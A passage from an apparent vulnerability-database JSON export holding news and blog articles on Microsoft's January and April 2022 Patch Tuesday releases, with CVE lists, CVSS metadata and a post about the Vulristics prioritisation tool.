of which \"requires an attacker to win a race condition.\"\n\nOther critical flaws to note include a number of remote code execution flaws in RPC Runtime Library ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>), CVSS score: 9.8), Windows Network File System ([CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>), CVSS scores: 9.8), Windows Server Service ([CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>)), Windows SMB ([CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>)), and Microsoft Dynamics 365 ([CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>)).\n\nMicrosoft also patched as many as 18 flaws in Windows DNS Server, one information disclosure flaw and 17 remote code execution flaws, all of which were reported by security researcher Yuki Chen. Also remediated are 15 privilege escalation flaws in the Windows Print Spooler component.\n\nThe patches arrive a week after the tech giant announced plans to make available a feature called [AutoPatch](<https://thehackernews.com/2022/04/microsofts-new-autopatch-feature-to.html>) in July 2022 that allows enterprises to expedite applying security fixes in a timely fashion while emphasizing on scalability and stability.\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, counting \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-04-01>)\n * [Apache Struts 2](<https://cwiki.apache.org/confluence/display/WW/S2-062>)\n * [Cisco Systems](<https://thehackernews.com/2022/04/cisa-warns-of-active-exploitation-of.html>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_11.html>)\n * [HP Teradici PCoIP Client](<https://support.hp.com/us-en/security-bulletins>)\n * [Juniper Networks](<https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=\\[Security%20Advisories\\]>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2022-April/thread.html>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://thehackernews.com/2022/04/vmware-releases-critical-patches-for.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T03:22:00", "type": "thn", "title": "Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26904"], "modified": "2022-04-13T03:22:09", "id": "THN:2A188AB3A1960F89715831B15A68311E", "href": "https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:43", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjhBjNHjU-yR3MwrRHvUS9tDvlmZ8hZdIuBZLlTiLvekhf4svlWJy4OELJMXg06rTqKY-p4BvsU0T8jjJl6NFi3ByDa_8Bm2AEF0p-kQEfufx4DTJRrPfnWneln3r_fQXG0mtIGvUKcm_8SWaGbR_SFykKEZokaVBdGvVTWLiVQgnyK_Ae02rDLl0eF>)\n\nMicrosoft on Tuesday kicked off its first set of updates for 2022 by [plugging 96 security holes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan>) across its software ecosystem, while urging customers to prioritize patching for what it calls a critical \"wormable\" vulnerability.\n\nOf the 96 vulnerabilities, nine are rated Critical and 89 are rated Important in severity, with six zero-day publicly known at the time of the release. This is in addition to [29 issues](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) patched in Microsoft Edge on January 6, 2022. None of the disclosed bugs are listed as under attack.\n\nThe patches cover a swath of the computing giant's portfolio, including Microsoft Windows and Windows Components, Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP).\n\nChief among them is [CVE-2022-21907](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907>) (CVSS score: 9.8), a remote code execution vulnerability rooted in the HTTP Protocol Stack. \"In most situations, an unauthenticated attacker could send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets,\" Microsoft noted in its advisory.\n\nRussian security researcher Mikhail Medvedev has been credited with discovering and reporting the error, with the Redmond-based company stressing that it's wormable, meaning no user interaction is necessary to trigger and propagate the infection.\n\n\"Although Microsoft has provided an official patch, this CVE is another reminder that software features allow opportunities for attackers to misuse functionalities for malicious acts,\" Danny Kim, principal architect at Virsec, said.\n\nMicrosoft also resolved six zero-days as part of its Patch Tuesday update, two of which are an integration of third-party fixes concerning the open-source libraries curl and libarchive.\n\n * [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>) (CVSS score: N/A) \u2013 Open-Source curl Remote Code Execution Vulnerability\n * [CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) (CVSS score: N/A) \u2013 Open-Source libarchive Remote Code Execution Vulnerability\n * [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>) (CVSS score: 7.8) \u2013 Windows Certificate Spoofing Vulnerability\n * [CVE-2022-21839](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>) (CVSS score: 6.1) \u2013 Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability\n * [CVE-2022-21874](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>) (CVSS score: 7.8) \u2013 Windows Security Center API Remote Code Execution Vulnerability\n * [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>) (CVSS score: 7.0) \u2013 Windows User Profile Service Elevation of Privilege Vulnerability\n\nAnother critical vulnerability of note concerns a remote code execution flaw ([CVE-2022-21849](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21849>), CVSS score: 9.8) in Windows Internet Key Exchange ([IKE](<https://en.wikipedia.org/wiki/Internet_Key_Exchange>)) version 2, which Microsoft said could be weaponized by a remote attacker to \"trigger multiple vulnerabilities without being authenticated.\"\n\nOn top of that, the patch also remediates a number of remote code execution flaws affecting Exchange Server, Microsoft Office ([CVE-2022-21840](<https://cve-2022-21840>)), SharePoint Server, RDP ([CVE-2022-21893](<https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside>)), and Windows Resilient File System as well as privilege escalation vulnerabilities in Active Directory Domain Services, Windows Accounts Control, Windows Cleanup Manager, and Windows Kerberos, among others.\n\nIt's worth stressing that CVE-2022-21907 and the three shortcomings uncovered in [Exchange Server](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) ([CVE-2022-21846](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21846>), [CVE-2022-21855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21855>), and [CVE-2022-21969](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21969>), CVSS scores: 9.0) have all been labeled as \"exploitation more likely,\" necessitating that the patches are applied immediately to counter potential real-world attacks targeting the weaknesses. The U.S. National Security Agency (NSA) has been acknowledged for flagging CVE-2022-21846.\n\n\"This massive Patch Tuesday comes during a time of chaos in the security industry whereby professionals are working overtime to remediate [Log4Shell](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) \u2014 reportedly the worst vulnerability seen in decades,\" Bharat Jogi, director of vulnerability and threat Research at Qualys, said.\n\n\"Events such as Log4Shell [\u2026] bring to the forefront the importance of having an automated inventory of everything that is used by an organization in their environment,\" Jogi added, stating \"It is the need of the hour to automate deployment of patches for events with defined schedules (e.g., MSFT Patch Tuesday), so security professionals can focus energy to respond efficiently to unpredictable events that pose dastardly risk.\"\n\n### Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, counting \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-01-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Google Chrome](<https://thehackernews.com/2022/01/google-releases-new-chrome-update-to.html>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2022-January/thread.html>)\n * Mozilla [Firefox](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-01/>), [Firefox ESR](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-02>), and [Thunderbird](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-03/>)\n * [Samba](<https://www.samba.org/samba/history/security.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [VMware](<https://thehackernews.com/2022/01/vmware-patches-important-bug-affecting.html>), and\n * [WordPress](<https://wordpress.org/news/2022/01/wordpress-5-8-3-security-release/>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T06:42:00", "type": "thn", "title": "First Patch Tuesday of 2022 Brings Fix for a Critical 'Wormable' Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21849", "CVE-2022-21855", "CVE-2022-21874", "CVE-2022-21893", "CVE-2022-21907", "CVE-2022-21919", "CVE-2022-21969"], "modified": "2022-01-16T08:40:23", "id": "THN:00A15BC93C4697B74FA1D56130C0C35E", "href": "https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2022-04-23T12:23:39", "description": "Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2022 and new improvements in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. I decided to add more comment sources. Because it's not just Tenable, Qualys, Rapid7 and ZDI make Microsoft Patch Tuesday reviews, but also other security companies and bloggers. \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239085>\n\nYou can see them in my automated security news telegram channel [avleonovnews](<https://t.me/avleonovnews>) after every second Tuesday of the month. So, now you can add any links with CVE comments to Vulristics.\n\nFor April Patch Tuesday I will add these sources:\n\n * [Kaspersky](<https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/>)\n * [KrebsOnSecurity](<https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/>)\n * [ComputerWeekly](<https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs>)\n * [TheHackersNews](<https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html>)\n * [Threatpost](<https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/>)\n\nLet's see if they highlight different sets of vulnerabilities.\n \n \n $ cat comments_links.txt\n Qualys|April 2022 Patch Tuesday: Microsoft Releases 145 Vulnerabilities with 10 Critical; Adobe Releases 4 Advisories, 78 Vulnerabilities with 51 Critical.|https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday\n ZDI|THE APRIL 2022 SECURITY UPDATE REVIEW|https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review\n Kaspersky|A bunch of vulnerabilities in Windows, one already exploited|https://www.kaspersky.com/blog/microsoft-patches-128-vulnerabilities/44099/\n KrebsOnSecurity|Microsoft Patch Tuesday, April 2022 Edition|https://krebsonsecurity.com/2022/04/microsoft-patch-tuesday-april-2022-edition/\n ComputerWeekly|Microsoft patches two zero-days, 10 critical bugs|https://www.computerweekly.com/news/252515909/Microsoft-patches-two-zero-days-10-critical-bugs\n TheHackersNews|Microsoft Issues Patches for 2 Windows Zero-Days and 126 Other Vulnerabilities|https://thehackernews.com/2022/04/microsoft-issues-patches-for-2-windows.html\n Threatpost|Microsoft Zero-Days, Wormable Bugs Spark Concern|https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/\n\nI have also added links to [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/04/12/april-2022-patch-tuesday>) and [ZDI](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) blogposts. Qualys didn't fix their blog search (apparently no one uses it). ZDI don't have a blog search, and duckduckgo stopped indexing them properly. \n\nIn addition, Tenable closed access to their [tenable.com](<http://tenable.com>). This is rather ironic considering that [Russian Tenable Security Day](<https://tenable-day.tiger-optics.ru/>) took place on February 10, 2022, just two months ago. [I participated in it](<https://www.youtube.com/watch?v=V5T3ftcFwdY>). It was a formal event with [Tenable's EMEA CTO and Regional Manager](<https://t.me/avleonovcom/961>). And now we are not talking about any support, updates and licenses for Russian companies and individuals, but even about access to the Tenable website. This is how the situation can change rapidly, if you trust Western vendors. Try not to do this.\n\nBut in any case, you can still use the Tenable blog as a source of comments about Patch Tuesday vulnerabilities. I have added socks proxy support to Vulristics.\n \n \n vulners_key = \"SFKJKEWRID2JFIJ...AAK3DHKSJD\"\n proxies = {\n 'http': \"socks5://<host>:<port>\",\n 'https': \"socks5://<host>:<port>\"\n }\n\nI run the command like this:\n \n \n $ python3.8 vulristics.py --report-type \"ms_patch_tuesday_extended\" --mspt-year 2022 --mspt-month \"April\" --mspt-comments-links-path \"comments_links.txt\" --rewrite-flag \"True\"\n\nJust like last month, I'm taking into account not only the vulnerabilities published on April 11 (117 CVEs), but also all the vulnerabilities since last Patch Tuesday (40 CVEs). There are a total of 157 CVEs in the report.\n \n \n MS PT Year: 2022\n MS PT Month: April\n MS PT Date: 2022-04-12\n MS PT CVEs found: 117\n Ext MS PT Date from: 2022-03-09\n Ext MS PT Date to: 2022-04-11\n Ext MS PT CVEs found: 40\n ALL MS PT CVEs: 157\n\n * Critical: 5\n * High: 51\n * Medium: 91\n * Low: 10\n\nLet's start with the critical ones:\n\n * **Elevation of Privilege** - Windows Common Log File System Driver ([CVE-2022-24521](<https://vulners.com/cve/CVE-2022-24521>)). Exploitation in the wild is mentioned in AttackerKB and Microsoft. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Functional Exploit). Since this vulnerability only allows a privilege escalation, it is likely paired with a separate code execution bug. This vulnerability was reported by the US National Security Agency.\n * **Remote Code Execution** - Remote Procedure Call Runtime ([CVE-2022-26809](<https://vulners.com/cve/CVE-2022-26809>)). An unauthenticated, remote attacker could exploit this vulnerability by sending \u201ca specially crafted RPC call to an RPC host.\u201d The vulnerability could allow a remote attacker to execute code at high privileges on an affected system. Since no user interaction is required, these factors combine to make this wormable, at least between machine where RPC can be reached. A proof of concept of this vulnerability [is available on giithub](<https://github.com/XmasSnow1/cve-2022-26809>). Other RCEs in RPC ([CVE-2022-24492](<https://vulners.com/cve/CVE-2022-24492>), [CVE-2022-24528](<https://vulners.com/cve/CVE-2022-24528>)) were also classified as Critical, but this is due to misattribution of exploits. The only exploitable is [CVE-2022-26809](<https://vulners.com/githubexploit/706a6eeb-1d07-53eb-8455-f7809863dadc>). \n * ****Remote Code Execution**** - Microsoft Edge ([CVE-2022-1096](<https://vulners.com/cve/CVE-2022-1096>)). In Vulristics report it was detected as **Unknown Vulnerability Type** because it's impossible to detect vulnerability type by description. "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see Google Chrome Releases for more information. Google is aware that an exploit for CVE-2022-1096 exists in the wild." In fact it is a well-known 0day RCE in Chrome, that affected all other Chromium-based browsers. Exploitation in the wild is mentioned in AttackerKB. The Vulristics report states that "Public exploit is found at Vulners". However, it's just a "Powershell script that dumps Chrome and Edge version to a text file in order to determine if you need to update due to CVE-2022-1096". Yes, it is difficult to determine what exactly was uploaded on github.\n\nNow let's see the most interesting vulnerabilities with the High level.\n\n * **Elevation of Privilege** - Windows User Profile Service ([CVE-2022-26904](<https://vulners.com/cve/CVE-2022-26904>)). This vulnerability supposed to have been fixed in the August 2021 update, when it was tracked as CVE-2021-34484. However, the researcher who discovered it later discovered a bypass, and then when that was fixed again in January, he went and bypassed it a second time. Not only is PoC out there for it, there\u2019s a [Metasploit module](<https://vulners.com/metasploit/msf:exploit/windows/local/cve_2022_26904_superprofile/>) as well. This privilege escalation vulnerability allows an attacker to gain code execution at SYSTEM level on affected systems. The vulnerability relies on winning a race condition, which can be tricky to reliably achieve.\n * **Information Disclosure** - Windows Kernel ([CVE-2022-24483](<https://vulners.com/cve/CVE-2022-24483>)). Little is known about this vulnerability and no one has highlighted this vulnerability, but there is a [PoC for it on github](<https://github.com/waleedassar/CVE-2022-24483>).\n * **Remote Code Execution** - Windows DNS Server ([CVE-2022-26812](<https://vulners.com/cve/CVE-2022-26812>), [CVE-2022-26814](<https://vulners.com/cve/CVE-2022-26814>), [CVE-2022-26829](<https://vulners.com/cve/CVE-2022-26829>)). Also, no one highlighted this vulnerability. Public exploit is mentioned by Microsoft in CVSS Temporal Score (Proof-of-Concept Exploit). There were 18(!) DNS Server bugs receiving patches this month.\n\nFor the remaining vulnerabilities, there is neither a sign of exploitation in the wild, nor a sign of a public exploit. Let's see the most interesting ones.\n\n * **Remote Code Execution** - Windows SMB ([CVE-2022-24500](<https://vulners.com/cve/CVE-2022-24500>)). This vulnerability requires that a user with an affected version of Windows access a malicious server. An attacker would have to host a specially crafted server share or website. Exploitability Assessment: Exploitation Less Likely. **Remote Code Execution** - Windows Kernel ([CVE-2022-24541](<https://vulners.com/cve/CVE-2022-24541>)) is actually a similar SMB vulnerability as well.\n * **Remote Code Execution** - Windows Network File System ([CVE-2022-24491](<https://vulners.com/cve/CVE-2022-24491>), [CVE-2022-24497](<https://vulners.com/cve/CVE-2022-24497>)). An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution. NOTE: This vulnerability is only exploitable for systems that have the NFS role enabled. Exploitability Assessment: Exploitation More Likely.\n\nAs you can see, additional sources of comments actually repeat everything that ZDI, Qualys, Rapid7 and Tenable highlight, but sometimes they add interesting details about vulnerabilities.\n\nThe full report is available: [ms_patch_tuesday_april2022_report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_april2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T09:22:32", "type": "avleonov", "title": "Microsoft Patch Tuesday April 2022 and custom CVE comments sources in Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-1096", "CVE-2022-24483", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24528", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26812", "CVE-2022-26814", "CVE-2022-26829", "CVE-2022-26904"], "modified": "2022-04-23T09:22:32", "id": "AVLEONOV:535BC5E36A5D2C8F60753A2CD4676692", "href": "https://avleonov.com/2022/04/23/microsoft-patch-tuesday-april-2022-and-custom-cve-comments-sources-in-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-01-18T21:32:10", "description": "How time flies sometimes. Microsoft yesterday released the first [patch Tuesday security updates of the year 2022](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan>). The update includes fixes for six zero-day vulnerabilities and a total of 97 bugs. This includes two Remote Code Execution (RCE) vulnerabilities affecting open source libraries. None of the zero-day flaws are known to have been exploited in the wild, but one of the other vulnerabilities is feared to be a wormable one.\n\nA [severe word ](<https://www.askwoody.com/newsletter/ms-defcon-1-business-patchers-be-on-alert/>)of warning for those running a network with a domain controller, the side effects this month are extreme. The advice is to hold of on the patch. Microsoft has a technology called Active Directory that allows workstations to authenticate with a \u201cdomain controller.\u201d This month\u2019s updates are causing such drastic issues with domain controllers that they can become stuck in a boot loop.\n\nPatches that can cause problems include the following:\n\n * [KB5009624](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009624-monthly-rollup-23f4910b-6bdd-475c-bb4d-c0e961aff0bc>) for Server 2012 R2\n * [KB5009595](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009595-security-only-update-060870c2-ad08-40e5-b000-a9f6d40c0831>) for Server 2012 R2\n * [KB5009546](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009546-os-build-14393-4886-0c2cac57-13b6-42e6-b318-41ca32428f91>) for Server 2016\n * [KB5009557](<https://support.microsoft.com/en-us/topic/january-11-2022-kb5009557-os-build-17763-2452-c3ee4073-1e7f-488b-86c9-d050672437ae>) for Server 2019\n\nIt\u2019s unclear if Server 2022 is similarly impacted.\n\nAlong with the update comes an [announcement](<https://msrc-blog.microsoft.com/2022/01/11/coming-soon-new-security-update-guide-notification-system/>) of a new security update guide notification system.\n\nLet\u2019s start by taking a closer look at the zero-days. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The first two we listed below have previously been fixed by a third party and are now being incorporated into Microsoft products.\n\n## Open Source Curl RCE vulnerability\n\n[CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>) is regarding a vulnerability in the curl open source library which is used by Windows. The January 2022 Windows Security Updates includes the most recent version of this library which addresses this vulnerability and others. The listed one can lead to a STARTTLS protocol injection via a Man-In-The-Middle attack.\n\nThe software, when processing trusted data, accepts any untrusted data that is also included with the trusted data, treating the untrusted data as if it were trusted. More specifically, when curl connects to an IMAP, POP3, SMTP or FTP server to exchange data securely using STARTTLS to upgrade the connection to TLS level, the server can still respond and send back multiple responses before the TLS upgrade. Such multiple pipelined responses are cached by curl. curl would then upgrade to TLS but not flush the in-queue of cached responses and instead use and trust the responses it got before the TLS handshake as if they were authenticated.\n\n## Libarchive RCE vulnerability\n\n[CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) is regarding a vulnerability in the libarchive open source library which is used by Windows. The January 2022 Windows Security Updates include the most recent version of this library which addresses the vulnerability and others. This vulnerability is described as libarchive 3.4.1 through 3.5.1 has a use-after-free in copy_string (called from do_uncompress_block and process_block).\n\n## Windows Certificate Spoofing vulnerability\n\n[CVE-2022-21836](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>) allows an attacker to bypass a security feature. A successful attacker could bypass the Windows Platform Binary Table (WPBT) verification by using a small number of compromised certificates. Microsoft has added those certificates to the Windows kernel driver block list, driver.stl. The Windows Platform Binary Table is a fixed firmware ACPI (Advanced Configuration and Power Interface) table. It was introduced by Microsoft to allow its vendors to execute programs every time a device boots. Certificates on the driver.stl will be blocked even if present in the WPBT.\n\n## Windows Event Tracing Discretionary Access Control List Denial of Service vulnerability\n\n[CVE-2022-21839](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>) does not provide us with a lot of details. Affected is some unknown processing of the component Event Tracing Discretionary Access Control List. The exploitability is said to be easy, and it is possible to launch the attack remotely. Required for exploitation is an authentication. A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or resource, making it inaccessible to its intended users.\n\n## Windows Security Center API RCE vulnerability\n\n[CVE-2022-21874](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>) is a publicly disclosed RCE vulnerability in the Windows Security Center API that received a [CVSS score](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) of 7.8. This vulnerability requires user interaction to exploit, and the attack vector is local.\n\n## Windows User Profile Service Elevation of Privilege (EoP) vulnerability\n\n[CVE-2022-21919](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>) is a publicly disclosed EoP vulnerability in the Windows User Profile Service API that has received a CVSS score of 7.0. The exploitation is known to be difficult, but the attack may be initiated remotely. The requirement for exploitation is a simple authentication.\n\n## HTTP Protocol Stack RCE vulnerability\n\n[CVE-2022-21907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907>) is not one of the zero-days, but it stands out because it is a critical vulnerability which could allow an unauthenticated attacker to send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets. While this is a vulnerability that would mostly affect servers, the fact that it requires no user interaction, there are no privileges required and it targets an elevated service makes experts believe it is [wormable](<https://www.bleepingcomputer.com/news/microsoft/microsoft-new-critical-windows-http-vulnerability-is-wormable/>). There are also some [questions](<https://twitter.com/SecGuru_OTX/status/1481176886843686912>) among experts about which Windows versions are vulnerable.\n\n## The new security update guide notification system\n\nNotifications are sent when information is added or changed in the Security Update Guide. Based on feedback, Microsoft has been working to make signing up for and receiving Security Update Guide notifications easier. Starting today, you can sign up with any email address that you want and receive notifications at that email address. There is no longer a requirement that the email be a Live ID.\n\nTo start 